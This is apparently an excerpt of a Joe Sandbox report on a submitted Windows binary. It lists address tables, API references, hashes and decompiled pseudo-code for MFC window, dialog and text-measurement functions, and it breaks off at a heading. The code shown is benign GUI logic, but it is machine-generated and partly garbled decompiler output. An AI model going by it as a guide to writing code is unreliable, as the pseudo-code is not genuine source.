0x00411e32
0x00411e37
0x00411e47
0x00411e49
0x00411e4c
0x00411e4f
0x00411e59
0x00411e59
0x00411e61
0x00411e69
0x00411e6c
0x00411e6f
0x00411e72
0x00411e75
0x00411e7f
0x00411e86
0x00411eaf
0x00411eb2
0x00412047
0x0041204e
0x00412053
0x0041205c
0x0041205c
0x00411eb8
0x00411ebd
0x00411ec3
0x00411ecc
0x00411ee5
0x00411f3a
0x00411f40
0x00411f4b
0x00411f4f
0x00411f5f
0x00411f62
0x00411f66
0x00411f6e
0x00411f79
0x00411f79
0x00411f7c
0x00411f7c
0x00411f80
0x00411f84
0x00411f85
0x00411f8a
0x00411f8f
0x00411f95
0x00411f91
0x00411f91
0x00411f91
0x00411fae
0x00411fb1
0x00411fb4
0x00411fd8
0x00411fde
0x00411fe8
0x00411fee
0x00411ff5
0x00411ff5
0x00411fee
0x00412002
0x00412008
0x00412008
0x00412011
0x0041201c
0x00412022
0x00412022
0x00412028
0x0041202d
0x00412036
0x00412036
0x0041203f
0x0041204b
0x0041204d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041203f
0x00411ef1
0x00000000
0x00411f30
0x00411f35
0x00411f37
0x00411f37
0x00000000
0x00411f35
0x00411ef1
0x00411e8d
0x00411e98
0x00000000
0x00000000
0x00411eac
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00411E37
GetSystemMetrics.USER32 ref: 00411EE9
GlobalLock.KERNEL32 ref: 00411F73
CreateDialogIndirectParamA.USER32(?,?,?,00411B77,00000000), ref: 00411FA5

Part of subcall function 00416AEC: InterlockedDecrement.KERNEL32(-000000F4), ref: 00416B00

DestroyWindow.USER32(00000000,?,?,?,00000000,?,?), ref: 0041201C
GlobalUnlock.KERNEL32(?,?,?,?,00000000,?,?), ref: 0041202D
GlobalFree.KERNEL32 ref: 00412036

Strings

MS Sans Serif, xrefs: 00411F0A
MS Shell Dlg, xrefs: 00411EF7
Helv, xrefs: 00411F1D

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
String ID: Helv$MS Sans Serif$MS Shell Dlg
API String ID: 2343056566-2894235370
Opcode ID: b92bef3789bdaf7cf45641bf13bee934e354941852864a1178ecb765b367d6cf
Instruction ID: aadedd96d0c9695131ff4cccacd717b3f0d87f33b0c70c2cb72ca24c31ea773e
Opcode Fuzzy Hash: b92bef3789bdaf7cf45641bf13bee934e354941852864a1178ecb765b367d6cf
Instruction Fuzzy Hash: 5A617131A0025ADFCF14EFA5D985AEEBBB1FF08304F10452FF505A62A1D7789A81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041D196, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 209
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0041D196(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
				struct tagRECT _v20;
				signed int _v24;
				intOrPtr _v28;
				struct tagRECT _v44;
				char _v304;
				void* __ebp;
				int _t69;
				signed char _t72;
				signed char _t77;
				signed int _t82;
				signed int _t84;
				void* _t90;
				struct HWND__* _t94;
				intOrPtr _t122;
				intOrPtr _t130;
				void* _t142;
				signed char _t143;
				signed char _t145;
				intOrPtr _t147;
				void* _t149;

				_t142 = __edx;
				_t147 = _a4;
				_t122 = __ecx;
				_t69 = GetWindowRect( *(_t147 + 0x1c),  &_v44);
				if( *((intOrPtr*)(_t147 + 0x70)) != _t122) {
					_t143 = 0;
					__eflags = 0;
					L5:
					if( *((intOrPtr*)(_t122 + 0x78)) != _t143 && ( *(_t147 + 0x68) & 0x00000040) != 0) {
						 *(_t122 + 0x64) =  *(_t122 + 0x64) | 0x00000040;
					}
					 *(_t122 + 0x64) =  *(_t122 + 0x64) & 0xfffffff9;
					_t72 =  *(_t147 + 0x64) & 0x00000006 |  *(_t122 + 0x64);
					 *(_t122 + 0x64) = _t72;
					if((_t72 & 0x00000040) == 0) {
						E004165E5(_t147,  &_v304, 0x104);
						E0041A843( *(_t122 + 0x1c),  &_v304);
					}
					_t77 = ( *(_t122 + 0x64) ^  *(_t147 + 0x64)) & 0x0000f000 ^  *(_t147 + 0x64) | 0x0000000f;
					if( *((intOrPtr*)(_t122 + 0x78)) == _t143) {
						_t78 = _t77 & 0x000000fe;
						__eflags = _t77 & 0x000000fe;
					} else {
						_t78 = _t77 | 0x00000001;
					}
					E004263C3(_t147, _t78);
					_v28 = _t143;
					if( *((intOrPtr*)(_t147 + 0x70)) != _t122 && IsWindowVisible( *(_t147 + 0x1c)) != 0) {
						E0041663D(_t147, _t143, _t143, _t143, _t143, _t143, 0x97);
						_v28 = 1;
					}
					_v24 = _v24 | 0xffffffff;
					if(_a8 == _t143) {
						_t144 = _t122 + 0x7c;
						E0041158A(_t122 + 0x7c,  *((intOrPtr*)(_t122 + 0x84)), _t147);
						E0041158A(_t122 + 0x7c,  *((intOrPtr*)(_t144 + 8)), 0);
						_t82 =  *0x439bf4; // 0x2
						_t145 = 0;
						__eflags = 0;
						_t84 =  *0x439bf0; // 0x2
						E0041663D(_t147, 0,  ~_t84,  ~_t82, 0, 0, 0x115);
					} else {
						CopyRect( &_v20, _a8);
						E0041A2F1(_t122,  &_v20);
						asm("cdq");
						_t40 =  &(_v20.bottom); // 0x50402834
						asm("cdq");
						_push(( *_t40 - _v20.top - _t142 >> 1) + _v20.top);
						_push((_v20.right - _v20.left - _t142 >> 1) + _v20.left);
						asm("movsd");
						asm("movsd");
						_push(_a4);
						asm("movsd");
						asm("movsd");
						_v24 = E0041DD44(_t122);
						_t46 =  &(_v20.bottom); // 0x50402834
						E0041663D(_a4, 0, _v20.left, _v20.top, _v20.right - _v20.left,  *_t46 - _v20.top, 0x114);
						_t147 = _a4;
						_t145 = 0;
					}
					if(E00413740(_t149, GetParent( *(_t147 + 0x1c))) != _t122) {
						if(_t122 != _t145) {
							_t94 =  *(_t122 + 0x1c);
						} else {
							_t94 = 0;
						}
						E00413740(_t149, SetParent( *(_t147 + 0x1c), _t94));
					}
					_t130 =  *((intOrPtr*)(_t147 + 0x70));
					_t165 = _t130 - _t122;
					if(_t130 != _t122) {
						__eflags = _t130 - _t145;
						if(_t130 == _t145) {
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t122 + 0x78)) - _t145;
						if( *((intOrPtr*)(_t122 + 0x78)) == _t145) {
							L30:
							__eflags = 0;
							L31:
							_push(0);
							_push(0xffffffff);
							goto L32;
						}
						__eflags =  *((intOrPtr*)(_t130 + 0x78)) - _t145;
						if(__eflags != 0) {
							goto L30;
						}
						_push(1);
						_pop(0);
						goto L31;
					} else {
						_push(_t145);
						_push(_v24);
						L32:
						_push(_t147);
						E0041D609(_t130, _t165);
						L33:
						_t166 = _v28 - _t145;
						 *((intOrPtr*)(_t147 + 0x70)) = _t122;
						if(_v28 != _t145) {
							E0041663D(_t147, _t145, _t145, _t145, _t145, _t145, 0x57);
						}
						E0041D5A8(_t122, _t147);
						_t90 = E004225AA(_t122, _t166);
						 *(_t90 + 0xb8) =  *(_t90 + 0xb8) | 0x0000000c;
						return _t90;
					}
				}
				_t143 = 0;
				if(_a8 != 0) {
					_t69 = EqualRect( &_v44, _a8);
					if(_t69 == 0) {
						goto L5;
					}
				}
				return _t69;
			}

0x0041d196
0x0041d1a1
0x0041d1ac
0x0041d1ae
0x0041d1b7
0x0041d1db
0x0041d1db
0x0041d1dd
0x0041d1e0
0x0041d1e8
0x0041d1e8
0x0041d1ec
0x0041d1f9
0x0041d1fd
0x0041d200
0x0041d210
0x0041d21f
0x0041d21f
0x0041d233
0x0041d239
0x0041d23f
0x0041d23f
0x0041d23b
0x0041d23b
0x0041d23b
0x0041d244
0x0041d24c
0x0041d24f
0x0041d26a
0x0041d26f
0x0041d26f
0x0041d276
0x0041d27d
0x0041d2fa
0x0041d303
0x0041d30f
0x0041d314
0x0041d319
0x0041d319
0x0041d325
0x0041d330
0x0041d27f
0x0041d286
0x0041d292
0x0041d2a0
0x0041d2a5
0x0041d2b0
0x0041d2b8
0x0041d2b9
0x0041d2c1
0x0041d2c2
0x0041d2c3
0x0041d2c6
0x0041d2c7
0x0041d2cd
0x0041d2d0
0x0041d2ee
0x0041d2f3
0x0041d2f6
0x0041d2f6
0x0041d346
0x0041d34a
0x0041d350
0x0041d34c
0x0041d34c
0x0041d34c
0x0041d35e
0x0041d35e
0x0041d363
0x0041d366
0x0041d368
0x0041d370
0x0041d372
0x00000000
0x00000000
0x0041d374
0x0041d377
0x0041d383
0x0041d383
0x0041d385
0x0041d385
0x0041d386
0x00000000
0x0041d386
0x0041d379
0x0041d37c
0x00000000
0x00000000
0x0041d37e
0x0041d380
0x00000000
0x0041d36a
0x0041d36a
0x0041d36b
0x0041d388
0x0041d388
0x0041d389
0x0041d38e
0x0041d38e
0x0041d391
0x0041d394
0x0041d39f
0x0041d39f
0x0041d3a7
0x0041d3ae
0x0041d3b3
0x00000000
0x0041d3b3
0x0041d368
0x0041d1b9
0x0041d1be
0x0041d1cb
0x0041d1d3
0x00000000
0x0041d1d9
0x0041d1d3
0x0041d3be

APIs

GetWindowRect.USER32 ref: 0041D1AE
EqualRect.USER32 ref: 0041D1CB

Part of subcall function 0041663D: SetWindowPos.USER32(?,?,?,?,?,?,00000000,?,00412218,00000000,00000000,00000000,00000000,00000000,00000097,00000000), ref: 00416664

IsWindowVisible.USER32(?), ref: 0041D254
CopyRect.USER32 ref: 0041D286
GetParent.USER32(?), ref: 0041D338
SetParent.USER32(?,0000E800), ref: 0041D357

Strings

@m7@, xrefs: 0041D1F3, 0041D227
4(@P, xrefs: 0041D2A5, 0041D2D0
@, xrefs: 0041D1E8

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: RectWindow$Parent$CopyEqualVisible
String ID: 4(@P$@$@m7@
API String ID: 3103310903-421610842
Opcode ID: cac131d4966f25c1f2986bdc59dfc1c95fe9cab75364f357d42edf9083789053
Instruction ID: 71934383aa5695cd313cdbbfccdfa0b0166ee7a8a5881c634a4d6990b46abeb0
Opcode Fuzzy Hash: cac131d4966f25c1f2986bdc59dfc1c95fe9cab75364f357d42edf9083789053
Instruction Fuzzy Hash: 5461A5B1A00609EFDF21DF65CC85AEF7BB9EF44304F10452AF92696291C738D982CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00413821, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00413821(void* __ecx, void* __edx) {
				_Unknown_base(*)()* _t33;
				void* _t35;
				void* _t36;
				void* _t41;
				void* _t44;
				long _t54;
				signed int _t58;
				void* _t61;
				void* _t66;
				struct HWND__* _t68;
				CHAR* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t66 = __edx;
				_t61 = __ecx;
				E00406520(E00429E08, _t75);
				_t68 =  *(_t75 + 8);
				_t71 = "AfxOldWndProc423";
				 *((intOrPtr*)(_t75 - 0x10)) = _t77 - 0x40;
				_t33 = GetPropA(_t68, _t71);
				 *(_t75 - 0x14) =  *(_t75 - 0x14) & 0x00000000;
				 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
				 *(_t75 - 0x18) = _t33;
				_t35 =  *(_t75 + 0xc) - 6;
				_t58 = 1;
				if(_t35 == 0) {
					_t36 = E00413740(_t75,  *(_t75 + 0x14));
					E004134A8(_t61, E00413740(_t75, _t68),  *(_t75 + 0x10), _t36);
					goto L9;
				} else {
					_t41 = _t35 - 0x1a;
					if(_t41 == 0) {
						_t58 = 0 | E00413509(E00413740(_t75, _t68),  *(_t75 + 0x14),  *(_t75 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t44 = _t41 - 0x62;
						if(_t44 == 0) {
							SetWindowLongA(_t68, 0xfffffffc,  *(_t75 - 0x18));
							RemovePropA(_t68, _t71);
							GlobalDeleteAtom(GlobalFindAtomA(_t71));
							goto L10;
						} else {
							if(_t44 != 0x8e) {
								L10:
								 *(_t75 - 0x14) = CallWindowProcA( *(_t75 - 0x18), _t68,  *(_t75 + 0xc),  *(_t75 + 0x10),  *(_t75 + 0x14));
							} else {
								_t74 = E00413740(_t75, _t68);
								E0041340C(_t74, _t75 - 0x30, _t75 - 0x1c);
								_t54 = CallWindowProcA( *(_t75 - 0x18), _t68, 0x110,  *(_t75 + 0x10),  *(_t75 + 0x14));
								_push( *((intOrPtr*)(_t75 - 0x1c)));
								 *(_t75 - 0x14) = _t54;
								_push(_t75 - 0x30);
								_push(_t74);
								E0041342F(_t66);
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
				return  *(_t75 - 0x14);
			}

0x00413821
0x00413821
0x00413826
0x00413831
0x00413834
0x00413839
0x0041383e
0x00413844
0x00413848
0x0041384c
0x00413854
0x00413857
0x00413858
0x0041390e
0x00413920
0x00000000
0x0041385e
0x0041385e
0x00413861
0x00413906
0x00413925
0x00413927
0x00000000
0x00000000
0x00413867
0x00413867
0x0041386a
0x004138cc
0x004138d4
0x004138e2
0x00000000
0x0041386c
0x00413871
0x00413929
0x0041393c
0x00413877
0x0041387d
0x00413888
0x0041389c
0x004138a2
0x004138a5
0x004138ab
0x004138ac
0x004138ad
0x004138ad
0x00413871
0x0041386a
0x00413861
0x004138ba
0x004138c3

APIs

__EH_prolog.LIBCMT ref: 00413826
GetPropA.USER32 ref: 0041383E
CallWindowProcA.USER32 ref: 0041389C

Part of subcall function 0041342F: GetWindowRect.USER32 ref: 00413454
Part of subcall function 0041342F: GetWindow.USER32(?,00000004), ref: 00413471

SetWindowLongA.USER32 ref: 004138CC
RemovePropA.USER32 ref: 004138D4
GlobalFindAtomA.KERNEL32 ref: 004138DB
GlobalDeleteAtom.KERNEL32 ref: 004138E2

Part of subcall function 0041340C: GetWindowRect.USER32 ref: 00413418

CallWindowProcA.USER32 ref: 00413936

Strings

AfxOldWndProc423, xrefs: 00413834, 0041383C, 004138D2, 004138DA

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
Opcode ID: ffe45afd7699b5a41d516579d2a7d3dc4d15bd4e98b8a7e359cf5195de427134
Instruction ID: 4899527f46ba9a8eebcd092d04d92ea77ba6043ae45329b01eeefbc2baec0ec1
Opcode Fuzzy Hash: ffe45afd7699b5a41d516579d2a7d3dc4d15bd4e98b8a7e359cf5195de427134
Instruction Fuzzy Hash: F3316F7290011ABBCB12AFA5DD49EFF7FB8EF09712F00402AF501A2151C7799A519BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004251B9, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004251B9() {
				int _t1;
				int _t7;
				struct HDC__* _t12;
				void* _t18;

				_t1 =  *0x436880; // 0xffffffff
				if(_t1 == 0xffffffff) {
					_t12 = GetDC(0);
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_t18 = SelectObject(_t12, _t18);
					}
					GetCharWidthA(_t12, 0x36, 0x36, 0x436880);
					if(_t18 != 0) {
						SelectObject(_t12, _t18);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t12);
					_t7 =  *0x436880; // 0xffffffff
					return _t7;
				}
				return _t1;
			}

0x004251b9
0x004251c1
0x004251e8
0x004251fd
0x00425201
0x00425207
0x00425207
0x00425213
0x0042521b
0x0042521f
0x00425222
0x00425222
0x0042522a
0x00425230
0x00000000
0x00425238
0x00425239

APIs

GetDC.USER32(00000000), ref: 004251CA
GetSystemMetrics.USER32 ref: 004251EA
CreateFontA.GDI32(00000000,?,?,00425352,00001000,?,?), ref: 004251F1
SelectObject.GDI32(00000000,00000000), ref: 00425205
GetCharWidthA.GDI32(00000000,00000036,00000036,00436880), ref: 00425213
SelectObject.GDI32(00000000,00000000), ref: 0042521F
DeleteObject.GDI32(00000000), ref: 00425222
ReleaseDC.USER32 ref: 0042522A

Strings

Marlett, xrefs: 004251D0

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
String ID: Marlett
API String ID: 1397664628-3688754224
Opcode ID: 7241a4e70ab03fdb0c4814db81f8993fad58ad3ff119ab58904e5ceeffb10693
Instruction ID: 574e7069028db96244f8dd859ef817299f0475ae2c7f4c91e639d061ecb05676
Opcode Fuzzy Hash: 7241a4e70ab03fdb0c4814db81f8993fad58ad3ff119ab58904e5ceeffb10693
Instruction Fuzzy Hash: A901A2317413507BC2312B266C8DE6B3F7CD7CBFA1B914225F515A2190CB654C01C6BC

Uniqueness

Uniqueness Score: -1.00%

Function 004037D0, Relevance: 15.4, APIs: 10, Instructions: 418
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004037D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
				void* _t21;

				if(_a44 < 0 || _a44 >= 0x14) {
					_a44 = 0;
				}
				_t21 =  *((intOrPtr*)(0x4362b0 + _a44 * 4))(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
				return _t21;
			}

0x004037d7
0x004037df
0x004037df
0x00403811
0x0040381c

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9b55a29c4ff860124db4037a09d88fdcf40b724d14769906d711a8e0ebbbae
Instruction ID: c8df5cefcab56e12fb6afff3c38bb4f7a638dfcd913fb832871c6968f8fa9c0e
Opcode Fuzzy Hash: 8a9b55a29c4ff860124db4037a09d88fdcf40b724d14769906d711a8e0ebbbae
Instruction Fuzzy Hash: 4EF1E4B2A00108EBCB04CF99D995EEE77B9BF8C308F118259F919A7240D735EA15CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0042914E, Relevance: 15.2, APIs: 10, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0042914E(void* __ecx, long* _a4, int* _a8, int _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28, intOrPtr _a32, char* _a36, int* _a40, signed int* _a44) {
				intOrPtr _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v24;
				CHAR* _v28;
				int _v32;
				signed int _v36;
				signed int _v40;
				struct tagSIZE _v48;
				struct tagPOINT _v56;
				struct tagSIZE _v64;
				struct tagTEXTMETRICA _v120;
				struct tagTEXTMETRICA _v176;
				signed int _t119;
				signed int _t120;
				int _t121;
				signed int* _t125;
				long* _t127;
				signed int _t131;
				signed char _t132;
				int _t140;
				signed char* _t142;
				int _t144;
				int _t149;
				int _t153;
				signed int _t156;
				signed short _t159;
				signed char* _t167;
				int* _t170;
				signed int _t174;
				int _t175;
				int _t185;
				signed int _t187;
				int _t189;
				int _t190;
				void* _t191;
				int* _t193;

				_t191 = __ecx;
				GetTextMetricsA( *(__ecx + 8),  &_v120);
				GetTextMetricsA( *(__ecx + 4),  &_v176);
				GetTextExtentPoint32A( *(__ecx + 8), 0x42e890, 1,  &_v48);
				_t119 = GetTextAlign( *(__ecx + 8));
				_v40 = _t119;
				_t120 = _t119 & 0x00000001;
				_v36 = _t120;
				if(_t120 == 0) {
					_t170 = _a8;
				} else {
					GetCurrentPositionEx( *(__ecx + 4),  &_v56);
					_t170 = _a8;
					 *_t170 = _v56.x;
				}
				_t121 =  *_t170;
				_t193 = _a40;
				_t167 = _a12;
				_t185 = 0;
				_v28 = _t167;
				_v32 = _t121;
				_a12 = _t121;
				_v12 = 0;
				_v20 = 0;
				if(_a20 != 0) {
					if(_a24 != 1) {
						_t159 = GetTabbedTextExtentA( *(_t191 + 8), 0x42e88c, 1, 0, 0);
						_t170 = _a8;
						_t185 = 0;
						_v20 = _t159 & 0x0000ffff;
					} else {
						_v20 =  *_a28;
					}
				}
				_v8 = _t185;
				if( *_a16 <= _t185) {
					L31:
					_t187 = _v40 & 0x00000006;
					_v48.cx = _a12 -  *_t170;
					_t125 = _a44;
					 *_t125 =  *_t125 & 0x00000000;
					if(_t187 != 0) {
						if(_t187 != 6) {
							if(_t187 == 2) {
								 *_t125 = _v12;
							}
							L38:
							if(_v36 != 0) {
								MoveToEx( *(_t191 + 4),  *_t170, _v56.y, 0);
							}
							 *_a16 = _t193 - _a40 >> 2;
							_t127 = _a4;
							 *_t127 = _v48.cx;
							_t127[1] = _v48.cy;
							return _t127;
						}
						asm("cdq");
						_t131 = _v12 - _t187 >> 1;
						L33:
						 *_t170 =  *_t170 + _t131;
						goto L38;
					}
					_t131 = _v12;
					goto L33;
				} else {
					while(1) {
						_t132 =  *_t167;
						_t174 = 0 | _t132 == _v120.tmBreakChar;
						_v24 = _t174;
						if(_t174 != _t185 || _a20 != _t185 && _t132 == 9) {
							GetTextExtentPoint32A( *(_t191 + 8), _v28, _v24 - _v28 + _t167,  &_v64);
							_t140 = _v64.cx - _v120.tmOverhang + _v32;
							if(_v24 == 0) {
								_t140 = E0042911A(_t140, _a24, _a28, _a32, _v20);
							}
							_t175 = _t140;
							if(_t193 != _a40) {
								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t175 - _a12;
							} else {
								_v12 = _v12 + _t175 - _a12;
							}
							_a12 = _t140;
							_v32 = _t140;
							_v28 =  &(_t167[1]);
						} else {
							_t144 = _t132 & 0x000000ff;
							if(( *(_t144 + 0x43b761) & 0x00000004) == 0) {
								GetCharWidthA( *(_t191 + 4), _t144, _t144,  &_v16);
								if(GetCharWidthA( *(_t191 + 8),  *_t167 & 0x000000ff,  *_t167 & 0x000000ff, _t193) == 0) {
									 *_t193 = _v120.tmAveCharWidth;
								}
								_t189 = _v16;
							} else {
								_t189 = _v176.tmAveCharWidth;
								 *_t193 = _v120.tmAveCharWidth;
							}
							_t190 = _t189 - _v176.tmOverhang;
							 *_t193 =  *_t193 - _v120.tmOverhang;
							_t149 =  *_t193;
							_a12 = _a12 + _t149;
							_v16 = _t190;
							if(_t193 != _a40) {
								asm("cdq");
								_t156 = _t149 - _t190 - _t190 >> 1;
								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t156;
								 *_t193 = _t149 - _t156;
							}
							_a36 = _a36 + 1;
							 *_a36 =  *_t167;
							if(( *(( *_t167 & 0x000000ff) + 0x43b761) & 0x00000004) != 0) {
								_a36 = _a36 + 1;
								 *_a36 = _t167[1];
								_t153 =  *_t193;
								_a12 = _a12 + _t153;
								_t193 =  &(_t193[1]);
								_v8 = _v8 + 1;
								 *_t193 = _t153;
							}
							_t193 =  &(_t193[1]);
						}
						_t142 = E00406AFA(_t167);
						_v8 = _v8 + 1;
						_t167 = _t142;
						if(_v8 >=  *_a16) {
							break;
						}
						_t185 = 0;
					}
					_t170 = _a8;
					goto L31;
				}
			}

0x00429162
0x00429168
0x00429174
0x00429184
0x0042918d
0x00429193
0x00429196
0x00429199
0x0042919c
0x004291b5
0x0042919e
0x004291a5
0x004291ab
0x004291b1
0x004291b1
0x004291b8
0x004291ba
0x004291be
0x004291c1
0x004291c3
0x004291c9
0x004291cc
0x004291cf
0x004291d2
0x004291d5
0x004291db
0x004291f3
0x004291f9
0x004291fc
0x00429201
0x004291dd
0x004291e2
0x004291e2
0x004291db
0x00429207
0x0042920c
0x0042934e
0x00429356
0x0042935a
0x0042935d
0x00429360
0x00429365
0x00429371
0x00429380
0x00429385
0x00429385
0x00429387
0x0042938b
0x00429397
0x00429397
0x004293aa
0x004293ac
0x004293b0
0x004293b5
0x004293b9
0x004293b9
0x00429376
0x00429379
0x0042936a
0x0042936a
0x00000000
0x0042936a
0x00429367
0x00000000
0x00429212
0x00429216
0x00429216
0x0042921d
0x00429222
0x00429225
0x004292e9
0x004292f5
0x004292fc
0x0042930b
0x0042930b
0x00429313
0x00429315
0x00429322
0x00429317
0x0042931a
0x0042931a
0x00429325
0x00429328
0x0042932e
0x00429238
0x00429238
0x00429242
0x0042925a
0x00429271
0x00429276
0x00429276
0x00429278
0x00429244
0x00429247
0x0042924d
0x0042924d
0x0042927e
0x00429284
0x00429286
0x00429288
0x0042928e
0x00429291
0x00429297
0x0042929a
0x0042929e
0x004292a1
0x004292a1
0x004292a8
0x004292ab
0x004292b7
0x004292bf
0x004292c2
0x004292c4
0x004292c6
0x004292c9
0x004292cc
0x004292cf
0x004292cf
0x004292d1
0x004292d1
0x00429332
0x00429337
0x0042933e
0x00429345
0x00000000
0x00000000
0x00429214
0x00429214
0x0042934b
0x00000000
0x0042934b

APIs

GetTextMetricsA.GDI32(?,?), ref: 00429168
GetTextMetricsA.GDI32(?,?), ref: 00429174
GetTextExtentPoint32A.GDI32(?,0042E890,00000001,?), ref: 00429184
GetTextAlign.GDI32(?), ref: 0042918D
GetCurrentPositionEx.GDI32(?,?), ref: 004291A5
GetTabbedTextExtentA.USER32(?,0042E88C,00000001,00000000,00000000), ref: 004291F3
GetCharWidthA.GDI32(?,?,?,?), ref: 0042925A
GetCharWidthA.GDI32(?,00000000,00000000,?), ref: 00429269
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 004292E9
MoveToEx.GDI32(?,?,?,00000000), ref: 00429397

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Text$Extent$CharMetricsPoint32Width$AlignCurrentMovePositionTabbed
String ID:
API String ID: 2070200100-0
Opcode ID: dbc0e650c6b3921614c61be6481f5bcec17f5e74d2995e425cda8442065db2ea
Instruction ID: 5ee3fa6e800e5c42c7f25724716c3f9a342090dd9abbfd9a25ef7c0a74f7065c
Opcode Fuzzy Hash: dbc0e650c6b3921614c61be6481f5bcec17f5e74d2995e425cda8442065db2ea
Instruction Fuzzy Hash: EE914670A0021AEFCF15CFA8D884AEEBBB5FF48304F54856AE859A7250D334AD51CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0042185A, Relevance: 15.1, APIs: 10, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

